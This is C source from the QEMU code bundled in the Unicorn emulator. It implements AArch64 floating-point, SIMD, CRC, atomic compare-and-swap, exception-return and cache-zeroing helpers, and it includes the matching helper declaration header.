float64_is_zero(a))) { return float64_one_point_five; } return float64_muladd(a, b, float64_three, float_muladd_halve_result, fpst); } /* Pairwise long add: add pairs of adjacent elements into * double-width elements in the result (eg _s8 is an 8x8->16 op) */ uint64_t HELPER(neon_addlp_s8)(uint64_t a) { uint64_t nsignmask = 0x0080008000800080ULL; uint64_t wsignmask = 0x8000800080008000ULL; uint64_t elementmask = 0x00ff00ff00ff00ffULL; uint64_t tmp1, tmp2; uint64_t res, signres; /* Extract odd elements, sign extend each to a 16 bit field */ tmp1 = a & elementmask; tmp1 ^= nsignmask; tmp1 |= wsignmask; tmp1 = (tmp1 - nsignmask) ^ wsignmask; /* Ditto for the even elements */ tmp2 = (a >> 8) & elementmask; tmp2 ^= nsignmask; tmp2 |= wsignmask; tmp2 = (tmp2 - nsignmask) ^ wsignmask; /* calculate the result by summing bits 0..14, 16..22, etc, * and then adjusting the sign bits 15, 23, etc manually. * This ensures the addition can't overflow the 16 bit field. */ signres = (tmp1 ^ tmp2) & wsignmask; res = (tmp1 & ~wsignmask) + (tmp2 & ~wsignmask); res ^= signres; return res; } uint64_t HELPER(neon_addlp_u8)(uint64_t a) { uint64_t tmp; tmp = a & 0x00ff00ff00ff00ffULL; tmp += (a >> 8) & 0x00ff00ff00ff00ffULL; return tmp; } uint64_t HELPER(neon_addlp_s16)(uint64_t a) { int32_t reslo, reshi; reslo = (int32_t)(int16_t)a + (int32_t)(int16_t)(a >> 16); reshi = (int32_t)(int16_t)(a >> 32) + (int32_t)(int16_t)(a >> 48); return (uint32_t)reslo | (((uint64_t)reshi) << 32); } uint64_t HELPER(neon_addlp_u16)(uint64_t a) { uint64_t tmp; tmp = a & 0x0000ffff0000ffffULL; tmp += (a >> 16) & 0x0000ffff0000ffffULL; return tmp; } /* Floating-point reciprocal exponent - see FPRecpX in ARM ARM */ uint32_t HELPER(frecpx_f16)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; uint16_t val16, sbit; int16_t exp; if (float16_is_any_nan(a)) { float16 nan = a; if (float16_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float16_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float16_default_nan(fpst); } return nan; } a = float16_squash_input_denormal(a, fpst); val16 = float16_val(a); sbit = 0x8000 & val16; exp = extract32(val16, 10, 5); if (exp == 0) { return make_float16(deposit32(sbit, 10, 5, 0x1e)); } else { return make_float16(deposit32(sbit, 10, 5, ~exp)); } } float32 HELPER(frecpx_f32)(float32 a, void *fpstp) { float_status *fpst = fpstp; uint32_t val32, sbit; int32_t exp; if (float32_is_any_nan(a)) { float32 nan = a; if (float32_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float32_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float32_default_nan(fpst); } return nan; } a = float32_squash_input_denormal(a, fpst); val32 = float32_val(a); sbit = 0x80000000ULL & val32; exp = extract32(val32, 23, 8); if (exp == 0) { return make_float32(sbit | (0xfe << 23)); } else { return make_float32(sbit | (~exp & 0xff) << 23); } } float64 HELPER(frecpx_f64)(float64 a, void *fpstp) { float_status *fpst = fpstp; uint64_t val64, sbit; int64_t exp; if (float64_is_any_nan(a)) { float64 nan = a; if (float64_is_signaling_nan(a, fpst)) { float_raise(float_flag_invalid, fpst); nan = float64_silence_nan(a, fpst); } if (fpst->default_nan_mode) { nan = float64_default_nan(fpst); } return nan; } a = float64_squash_input_denormal(a, fpst); val64 = float64_val(a); sbit = 0x8000000000000000ULL & val64; exp = extract64(float64_val(a), 52, 11); if (exp == 0) { return make_float64(sbit | (0x7feULL << 52)); } else { return make_float64(sbit | (~exp & 0x7ffULL) << 52); } } 
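/*
 * Editor's illustrative sketch, not part of the original file: the three
 * frecpx helpers above all implement the same FPRecpX operation from the
 * ARM ARM -- keep the sign bit, force the fraction to zero, and bitwise-
 * invert the biased exponent field. A minimal stand-alone model of that
 * bit manipulation for the single-precision layout; the function names
 * here are hypothetical and exist only for this demonstration.
 */
#include <stdint.h>
#include <assert.h>

static inline uint32_t frecpx_f32_bits_sketch(uint32_t bits)
{
    uint32_t sign = bits & 0x80000000u;
    uint32_t exp = (bits >> 23) & 0xffu;    /* biased exponent field */

    if (exp == 0) {
        /* zero/denormal input: result takes the maximum finite exponent */
        return sign | (0xfeu << 23);
    }
    /* normal input: exponent inverted, fraction forced to zero */
    return sign | ((~exp & 0xffu) << 23);
}

static void frecpx_f32_bits_sketch_check(void)
{
    /* 2.0f is 0x40000000 (exp 0x80); FPRecpX maps it to exp 0x7f, i.e. 1.0f,
     * matching the (~exp & 0xff) path in HELPER(frecpx_f32) above. */
    assert(frecpx_f32_bits_sketch(0x40000000u) == 0x3f800000u);
}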
float32 HELPER(fcvtx_f64_to_f32)(float64 a, CPUARMState *env) { /* Von Neumann rounding is implemented by using round-to-zero * and then setting the LSB of the result if Inexact was raised. */ float32 r; float_status *fpst = &env->vfp.fp_status; float_status tstat = *fpst; int exflags; set_float_rounding_mode(float_round_to_zero, &tstat); set_float_exception_flags(0, &tstat); r = float64_to_float32(a, &tstat); exflags = get_float_exception_flags(&tstat); if (exflags & float_flag_inexact) { r = make_float32(float32_val(r) | 1); } exflags |= get_float_exception_flags(fpst); set_float_exception_flags(exflags, fpst); return r; } /* 64-bit versions of the CRC helpers. Note that although the operation * (and the prototypes of crc32c() and crc32()) mean that only the bottom * 32 bits of the accumulator and result are used, we pass and return * uint64_t for convenience of the generated code. Unlike the 32-bit * instruction set versions, val may genuinely have 64 bits of data in it. * The upper bytes of val (above the number specified by 'bytes') must have * been zeroed out by the caller. */ uint64_t HELPER(crc32_64)(uint64_t acc, uint64_t val, uint32_t bytes) { uint8_t buf[8]; stq_le_p(buf, val); return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; } uint64_t HELPER(crc32c_64)(uint64_t acc, uint64_t val, uint32_t bytes) { uint8_t buf[8]; stq_le_p(buf, val); /* Linux crc32c converts the output to one's complement. */ return crc32c(acc, buf, bytes) ^ 0xffffffff; } uint64_t HELPER(paired_cmpxchg64_le)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 cmpv = int128_make128(env->exclusive_val, env->exclusive_high); Int128 newv = int128_make128(new_lo, new_hi); Int128 oldv; uintptr_t ra = GETPC(); uint64_t o0, o1; bool success; int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi0 = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); TCGMemOpIdx oi1 = make_memop_idx(MO_LEQ, mem_idx); o0 = helper_le_ldq_mmu(env, addr + 0, oi0, ra); o1 = helper_le_ldq_mmu(env, addr + 8, oi1, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (success) { helper_le_stq_mmu(env, addr + 0, int128_getlo(newv), oi1, ra); helper_le_stq_mmu(env, addr + 8, int128_gethi(newv), oi1, ra); } return !success; } uint64_t HELPER(paired_cmpxchg64_le_parallel)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); bool success; int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->exclusive_val, env->exclusive_high); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, oi, ra); success = int128_eq(oldv, cmpv); return !success; } uint64_t HELPER(paired_cmpxchg64_be)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { /* * High and low need to be switched here because this is not actually a * 128bit store but two doublewords stored consecutively */ Int128 cmpv = int128_make128(env->exclusive_high, env->exclusive_val); Int128 newv = int128_make128(new_hi, new_lo); Int128 oldv; uintptr_t ra = GETPC(); uint64_t o0, o1; bool success; int mem_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi0 = make_memop_idx(MO_BEQ | MO_ALIGN_16, mem_idx); TCGMemOpIdx oi1 = make_memop_idx(MO_BEQ, mem_idx); o1 = helper_be_ldq_mmu(env, addr + 0, oi0, ra); o0 = helper_be_ldq_mmu(env, addr + 8, oi1, ra); oldv = int128_make128(o0, o1); success = int128_eq(oldv, cmpv); if (success) {
helper_be_stq_mmu(env, addr + 0, int128_gethi(newv), oi1, ra); helper_be_stq_mmu(env, addr + 8, int128_getlo(newv), oi1, ra); } return !success; } uint64_t HELPER(paired_cmpxchg64_be_parallel)(CPUARMState *env, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); bool success; int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_BEQ | MO_ALIGN_16, mem_idx); /* * High and low need to be switched here because this is not actually a * 128bit store but two doublewords stored consecutively */ cmpv = int128_make128(env->exclusive_high, env->exclusive_val); newv = int128_make128(new_hi, new_lo); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); success = int128_eq(oldv, cmpv); return !success; } /* Writes back the old data into Rs. */ void HELPER(casp_le_parallel)(CPUARMState *env, uint32_t rs, uint64_t addr, uint64_t new_lo, uint64_t new_hi) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->xregs[rs], env->xregs[rs + 1]); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_le_mmu(env, addr, cmpv, newv, oi, ra); env->xregs[rs] = int128_getlo(oldv); env->xregs[rs + 1] = int128_gethi(oldv); } void HELPER(casp_be_parallel)(CPUARMState *env, uint32_t rs, uint64_t addr, uint64_t new_hi, uint64_t new_lo) { Int128 oldv, cmpv, newv; uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_LEQ | MO_ALIGN_16, mem_idx); cmpv = int128_make128(env->xregs[rs + 1], env->xregs[rs]); newv = int128_make128(new_lo, new_hi); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); env->xregs[rs + 1] = int128_getlo(oldv); env->xregs[rs] = int128_gethi(oldv); } /* * AdvSIMD half-precision */ #define ADVSIMD_HELPER(name, suffix) HELPER(glue(glue(advsimd_, name), suffix)) #define ADVSIMD_HALFOP(name) \ uint32_t ADVSIMD_HELPER(name, h)(uint32_t a, uint32_t b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float16_ ## name(a, b, fpst); \ } ADVSIMD_HALFOP(add) ADVSIMD_HALFOP(sub) ADVSIMD_HALFOP(mul) ADVSIMD_HALFOP(div) ADVSIMD_HALFOP(min) ADVSIMD_HALFOP(max) ADVSIMD_HALFOP(minnum) ADVSIMD_HALFOP(maxnum) #define ADVSIMD_TWOHALFOP(name) \ uint32_t ADVSIMD_HELPER(name, 2h)(uint32_t two_a, uint32_t two_b, void *fpstp) \ { \ float16 a1, a2, b1, b2; \ uint32_t r1, r2; \ float_status *fpst = fpstp; \ a1 = extract32(two_a, 0, 16); \ a2 = extract32(two_a, 16, 16); \ b1 = extract32(two_b, 0, 16); \ b2 = extract32(two_b, 16, 16); \ r1 = float16_ ## name(a1, b1, fpst); \ r2 = float16_ ## name(a2, b2, fpst); \ return deposit32(r1, 16, 16, r2); \ } ADVSIMD_TWOHALFOP(add) ADVSIMD_TWOHALFOP(sub) ADVSIMD_TWOHALFOP(mul) ADVSIMD_TWOHALFOP(div) ADVSIMD_TWOHALFOP(min) ADVSIMD_TWOHALFOP(max) ADVSIMD_TWOHALFOP(minnum) ADVSIMD_TWOHALFOP(maxnum) /* Data processing - scalar floating-point and advanced SIMD */ static float16 float16_mulx(float16 a, float16 b, void *fpstp) { float_status *fpst = fpstp; a = float16_squash_input_denormal(a, fpst); b = float16_squash_input_denormal(b, fpst); if ((float16_is_zero(a) && float16_is_infinity(b)) || (float16_is_infinity(a) && float16_is_zero(b))) { /* 2.0 with the sign bit set to sign(A) XOR sign(B) */ return make_float16((1U << 14) | ((float16_val(a) ^ float16_val(b)) & (1U << 15))); } return 
float16_mul(a, b, fpst); } ADVSIMD_HALFOP(mulx) ADVSIMD_TWOHALFOP(mulx) /* fused multiply-accumulate */ uint32_t HELPER(advsimd_muladdh)(uint32_t a, uint32_t b, uint32_t c, void *fpstp) { float_status *fpst = fpstp; return float16_muladd(a, b, c, 0, fpst); } uint32_t HELPER(advsimd_muladd2h)(uint32_t two_a, uint32_t two_b, uint32_t two_c, void *fpstp) { float_status *fpst = fpstp; float16 a1, a2, b1, b2, c1, c2; uint32_t r1, r2; a1 = extract32(two_a, 0, 16); a2 = extract32(two_a, 16, 16); b1 = extract32(two_b, 0, 16); b2 = extract32(two_b, 16, 16); c1 = extract32(two_c, 0, 16); c2 = extract32(two_c, 16, 16); r1 = float16_muladd(a1, b1, c1, 0, fpst); r2 = float16_muladd(a2, b2, c2, 0, fpst); return deposit32(r1, 16, 16, r2); } /* * Floating point comparisons produce an integer result. Softfloat * routines return float_relation types which we convert to the 0/-1 * Neon requires. */ #define ADVSIMD_CMPRES(test) (test) ? 0xffff : 0 uint32_t HELPER(advsimd_ceq_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare_quiet(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_equal); } uint32_t HELPER(advsimd_cge_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater || compare == float_relation_equal); } uint32_t HELPER(advsimd_cgt_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; int compare = float16_compare(a, b, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater); } uint32_t HELPER(advsimd_acge_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float16 f0 = float16_abs(a); float16 f1 = float16_abs(b); int compare = float16_compare(f0, f1, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater || compare == float_relation_equal); } uint32_t HELPER(advsimd_acgt_f16)(uint32_t a, uint32_t b, void *fpstp) { float_status *fpst = fpstp; float16 f0 = float16_abs(a); float16 f1 = float16_abs(b); int compare = float16_compare(f0, f1, fpst); return ADVSIMD_CMPRES(compare == float_relation_greater); } /* round to integral */ uint32_t HELPER(advsimd_rinth_exact)(uint32_t x, void *fp_status) { return float16_round_to_int(x, fp_status); } uint32_t HELPER(advsimd_rinth)(uint32_t x, void *fp_status) { int old_flags = get_float_exception_flags(fp_status), new_flags; float16 ret; ret = float16_round_to_int(x, fp_status); /* Suppress any inexact exceptions the conversion produced */ if (!(old_flags & float_flag_inexact)) { new_flags = get_float_exception_flags(fp_status); set_float_exception_flags(new_flags & ~float_flag_inexact, fp_status); } return ret; } /* * Half-precision floating point conversion functions * * There are a multitude of conversion functions with various * different rounding modes. This is dealt with by the calling code * setting the mode appropriately before calling the helper. 
*/ uint32_t HELPER(advsimd_f16tosinth)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; /* Invalid if we are passed a NaN */ if (float16_is_any_nan(a)) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int16(a, fpst); } uint32_t HELPER(advsimd_f16touinth)(uint32_t a, void *fpstp) { float_status *fpst = fpstp; /* Invalid if we are passed a NaN */ if (float16_is_any_nan(a)) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint16(a, fpst); } static int el_from_spsr(uint32_t spsr) { /* Return the exception level that this SPSR is requesting a return to, * or -1 if it is invalid (an illegal return) */ if (spsr & PSTATE_nRW) { switch (spsr & CPSR_M) { case ARM_CPU_MODE_USR: return 0; case ARM_CPU_MODE_HYP: return 2; case ARM_CPU_MODE_FIQ: case ARM_CPU_MODE_IRQ: case ARM_CPU_MODE_SVC: case ARM_CPU_MODE_ABT: case ARM_CPU_MODE_UND: case ARM_CPU_MODE_SYS: return 1; case ARM_CPU_MODE_MON: /* Returning to Mon from AArch64 is never possible, * so this is an illegal return. */ default: return -1; } } else { if (extract32(spsr, 1, 1)) { /* Return with reserved M[1] bit set */ return -1; } if (extract32(spsr, 0, 4) == 1) { /* return to EL0 with M[0] bit set */ return -1; } return extract32(spsr, 2, 2); } } void HELPER(exception_return)(CPUARMState *env, uint64_t new_pc) { int cur_el = arm_current_el(env); unsigned int spsr_idx = aarch64_banked_spsr_index(cur_el); uint32_t mask, spsr = env->banked_spsr[spsr_idx]; int new_el; bool return_to_aa64 = (spsr & PSTATE_nRW) == 0; aarch64_save_sp(env, cur_el); arm_clear_exclusive(env); /* We must squash the PSTATE.SS bit to zero unless both of the * following hold: * 1. debug exceptions are currently disabled * 2. singlestep will be active in the EL we return to * We check 1 here and 2 after we've done the pstate/cpsr write() to * transition to the EL we're going to. */ if (arm_generate_debug_exceptions(env)) { spsr &= ~PSTATE_SS; } new_el = el_from_spsr(spsr); if (new_el == -1) { goto illegal_return; } if (new_el > cur_el || (new_el == 2 && !arm_feature(env, ARM_FEATURE_EL2))) { /* Disallow return to an EL which is unimplemented or higher * than the current one. */ goto illegal_return; } if (new_el != 0 && arm_el_is_aa64(env, new_el) != return_to_aa64) { /* Return to an EL which is configured for a different register width */ goto illegal_return; } if (new_el == 2 && arm_is_secure_below_el3(env)) { /* Return to the non-existent secure-EL2 */ goto illegal_return; } if (new_el == 1 && (arm_hcr_el2_eff(env) & HCR_TGE)) { goto illegal_return; } arm_call_pre_el_change_hook(env_archcpu(env)); if (!return_to_aa64) { env->aarch64 = 0; /* We do a raw CPSR write because aarch64_sync_64_to_32() * will sort the register banks out for us, and we've already * caught all the bad-mode cases in el_from_spsr(). 
*/ mask = aarch32_cpsr_valid_mask(env->features, &env_archcpu(env)->isar); cpsr_write(env, spsr, mask, CPSRWriteRaw); if (!arm_singlestep_active(env)) { env->uncached_cpsr &= ~PSTATE_SS; } aarch64_sync_64_to_32(env); if (spsr & CPSR_T) { env->regs[15] = new_pc & ~0x1; } else { env->regs[15] = new_pc & ~0x3; } helper_rebuild_hflags_a32(env, new_el); qemu_log_mask(CPU_LOG_INT, "Exception return from AArch64 EL%d to " "AArch32 EL%d PC 0x%" PRIx32 "\n", cur_el, new_el, env->regs[15]); } else { int tbii; env->aarch64 = 1; spsr &= aarch64_pstate_valid_mask(&env_archcpu(env)->isar); pstate_write(env, spsr); if (!arm_singlestep_active(env)) { env->pstate &= ~PSTATE_SS; } aarch64_restore_sp(env, new_el); helper_rebuild_hflags_a64(env, new_el); /* * Apply TBI to the exception return address. We had to delay this * until after we selected the new EL, so that we could select the * correct TBI+TBID bits. This is made easier by waiting until after * the hflags rebuild, since we can pull the composite TBII field * from there. */ tbii = FIELD_EX32(env->hflags, TBFLAG_A64, TBII); if ((tbii >> extract64(new_pc, 55, 1)) & 1) { /* TBI is enabled. */ int core_mmu_idx = cpu_mmu_index(env, false); if (regime_has_2_ranges(core_to_aa64_mmu_idx(core_mmu_idx))) { new_pc = sextract64(new_pc, 0, 56); } else { new_pc = extract64(new_pc, 0, 56); } } env->pc = new_pc; qemu_log_mask(CPU_LOG_INT, "Exception return from AArch64 EL%d to " "AArch64 EL%d PC 0x%" PRIx64 "\n", cur_el, new_el, env->pc); } /* * Note that cur_el can never be 0. If new_el is 0, then * el0_a64 is return_to_aa64, else el0_a64 is ignored. */ aarch64_sve_change_el(env, cur_el, new_el, return_to_aa64); arm_call_el_change_hook(env_archcpu(env)); return; illegal_return: /* Illegal return events of various kinds have architecturally * mandated behaviour: * restore NZCV and DAIF from SPSR_ELx * set PSTATE.IL * restore PC from ELR_ELx * no change to exception level, execution state or stack pointer */ env->pstate |= PSTATE_IL; env->pc = new_pc; spsr &= PSTATE_NZCV | PSTATE_DAIF; spsr |= pstate_read(env) & ~(PSTATE_NZCV | PSTATE_DAIF); pstate_write(env, spsr); if (!arm_singlestep_active(env)) { env->pstate &= ~PSTATE_SS; } qemu_log_mask(LOG_GUEST_ERROR, "Illegal exception return at EL%d: " "resuming execution at 0x%" PRIx64 "\n", cur_el, env->pc); } /* * Square Root and Reciprocal square root */ uint32_t HELPER(sqrt_f16)(uint32_t a, void *fpstp) { float_status *s = fpstp; return float16_sqrt(a, s); } void HELPER(dc_zva)(CPUARMState *env, uint64_t vaddr_in) { /* * Implement DC ZVA, which zeroes a fixed-length block of memory. * Note that we do not implement the (architecturally mandated) * alignment fault for attempts to use this on Device memory * (which matches the usual QEMU behaviour of not implementing either * alignment faults or any memory attribute handling). */ struct uc_struct *uc = env->uc; ARMCPU *cpu = env_archcpu(env); uint64_t blocklen = 4 << cpu->dcz_blocksize; uint64_t vaddr = vaddr_in & ~(blocklen - 1); /* * Slightly awkwardly, QEMU's TARGET_PAGE_SIZE may be less than * the block size so we might have to do more than one TLB lookup. * We know that in fact for any v8 CPU the page size is at least 4K * and the block size must be 2K or less, but TARGET_PAGE_SIZE is only * 1K as an artefact of legacy v5 subpage support being present in the * same QEMU executable. So in practice the hostaddr[] array has * two entries, given the current setting of TARGET_PAGE_BITS_MIN. 
*/ int maxidx = DIV_ROUND_UP(blocklen, TARGET_PAGE_SIZE); void *hostaddr[DIV_ROUND_UP(2 * KiB, 1 << TARGET_PAGE_BITS_MIN)]; int try, i; unsigned mmu_idx = cpu_mmu_index(env, false); TCGMemOpIdx oi = make_memop_idx(MO_UB, mmu_idx); assert(maxidx <= ARRAY_SIZE(hostaddr)); for (try = 0; try < 2; try++) { for (i = 0; i < maxidx; i++) { hostaddr[i] = tlb_vaddr_to_host(env, vaddr + TARGET_PAGE_SIZE * i, 1, mmu_idx); if (!hostaddr[i]) { break; } } if (i == maxidx) { /* * If it's all in the TLB it's fair game for just writing to; * we know we don't need to update dirty status, etc. */ for (i = 0; i < maxidx - 1; i++) { memset(hostaddr[i], 0, TARGET_PAGE_SIZE); } memset(hostaddr[i], 0, blocklen - (i * TARGET_PAGE_SIZE)); return; } /* * OK, try a store and see if we can populate the tlb. This * might cause an exception if the memory isn't writable, * in which case we will longjmp out of here. We must for * this purpose use the actual register value passed to us * so that we get the fault address right. */ helper_ret_stb_mmu(env, vaddr_in, 0, oi, GETPC()); /* Now we can populate the other TLB entries, if any */ for (i = 0; i < maxidx; i++) { uint64_t va = vaddr + TARGET_PAGE_SIZE * i; if (va != (vaddr_in & TARGET_PAGE_MASK)) { helper_ret_stb_mmu(env, va, 0, oi, GETPC()); } } } /* * Slow path (probably attempt to do this to an I/O device or * similar, or clearing of a block of code we have translations * cached for). Just do a series of byte writes as the architecture * demands. It's not worth trying to use a cpu_physical_memory_map(), * memset(), unmap() sequence here because: * + we'd need to account for the blocksize being larger than a page * + the direct-RAM access case is almost always going to be dealt * with in the fastpath code above, so there's no speed benefit * + we would have to deal with the map returning NULL because the * bounce buffer was in use */ for (i = 0; i < blocklen; i++) { helper_ret_stb_mmu(env, vaddr + i, 0, oi, GETPC()); } }

unicorn-2.1.1/qemu/target/arm/helper-a64.h

/* * AArch64 specific helper definitions * * Copyright (c) 2013 Alexander Graf <agraf@suse.de> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details.
* * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ DEF_HELPER_FLAGS_2(udiv64, TCG_CALL_NO_RWG_SE, i64, i64, i64) DEF_HELPER_FLAGS_2(sdiv64, TCG_CALL_NO_RWG_SE, s64, s64, s64) DEF_HELPER_FLAGS_1(rbit64, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_2(msr_i_spsel, void, env, i32) DEF_HELPER_2(msr_i_daifset, void, env, i32) DEF_HELPER_2(msr_i_daifclear, void, env, i32) DEF_HELPER_3(vfp_cmph_a64, i64, f16, f16, ptr) DEF_HELPER_3(vfp_cmpeh_a64, i64, f16, f16, ptr) DEF_HELPER_3(vfp_cmps_a64, i64, f32, f32, ptr) DEF_HELPER_3(vfp_cmpes_a64, i64, f32, f32, ptr) DEF_HELPER_3(vfp_cmpd_a64, i64, f64, f64, ptr) DEF_HELPER_3(vfp_cmped_a64, i64, f64, f64, ptr) DEF_HELPER_FLAGS_5(simd_tbl, TCG_CALL_NO_RWG_SE, i64, env, i64, i64, i32, i32) DEF_HELPER_FLAGS_3(vfp_mulxs, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(vfp_mulxd, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_3(neon_ceq_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(neon_cge_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(neon_cgt_f64, TCG_CALL_NO_RWG, i64, i64, i64, ptr) DEF_HELPER_FLAGS_3(recpsf_f16, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(recpsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(recpsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_3(rsqrtsf_f16, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(rsqrtsf_f32, TCG_CALL_NO_RWG, f32, f32, f32, ptr) DEF_HELPER_FLAGS_3(rsqrtsf_f64, TCG_CALL_NO_RWG, f64, f64, f64, ptr) DEF_HELPER_FLAGS_1(neon_addlp_s8, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_u8, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_s16, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_1(neon_addlp_u16, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_FLAGS_2(frecpx_f64, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(frecpx_f32, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(frecpx_f16, TCG_CALL_NO_RWG, f16, f16, ptr) DEF_HELPER_FLAGS_2(fcvtx_f64_to_f32, TCG_CALL_NO_RWG, f32, f64, env) DEF_HELPER_FLAGS_3(crc32_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) DEF_HELPER_FLAGS_3(crc32c_64, TCG_CALL_NO_RWG_SE, i64, i64, i64, i32) DEF_HELPER_FLAGS_4(paired_cmpxchg64_le, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_le_parallel, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_be, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(paired_cmpxchg64_be_parallel, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_5(casp_le_parallel, void, env, i32, i64, i64, i64) DEF_HELPER_5(casp_be_parallel, void, env, i32, i64, i64, i64) DEF_HELPER_FLAGS_3(advsimd_maxh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_minh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_maxnumh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_FLAGS_3(advsimd_minnumh, TCG_CALL_NO_RWG, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_addh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_subh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_mulh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_divh, f16, f16, f16, ptr) DEF_HELPER_3(advsimd_ceq_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_cge_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_cgt_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_acge_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_acgt_f16, i32, f16, f16, ptr) DEF_HELPER_3(advsimd_mulxh, f16, f16, f16, ptr) DEF_HELPER_4(advsimd_muladdh, f16, f16, f16, f16, ptr) 
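/*
 * Editor's illustrative sketch, not part of the original header: the "2h"
 * helpers declared below are typed with i32 arguments rather than f16
 * because each 32-bit word carries two packed IEEE half-precision values
 * (see the ADVSIMD_TWOHALFOP macro in helper-a64.c). A minimal stand-alone
 * model of that unpack/op/re-pack pattern; the function and parameter
 * names here are hypothetical.
 */
#include <stdint.h>

static inline uint32_t twohalf_op_sketch(uint32_t two_a, uint32_t two_b,
                                         uint16_t (*op16)(uint16_t, uint16_t))
{
    uint16_t a1 = two_a & 0xffffu, a2 = two_a >> 16;  /* low/high elements */
    uint16_t b1 = two_b & 0xffffu, b2 = two_b >> 16;
    uint32_t r1 = op16(a1, b1);                       /* element 0 */
    uint32_t r2 = op16(a2, b2);                       /* element 1 */
    return (r1 & 0xffffu) | (r2 << 16);               /* re-pack result */
}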
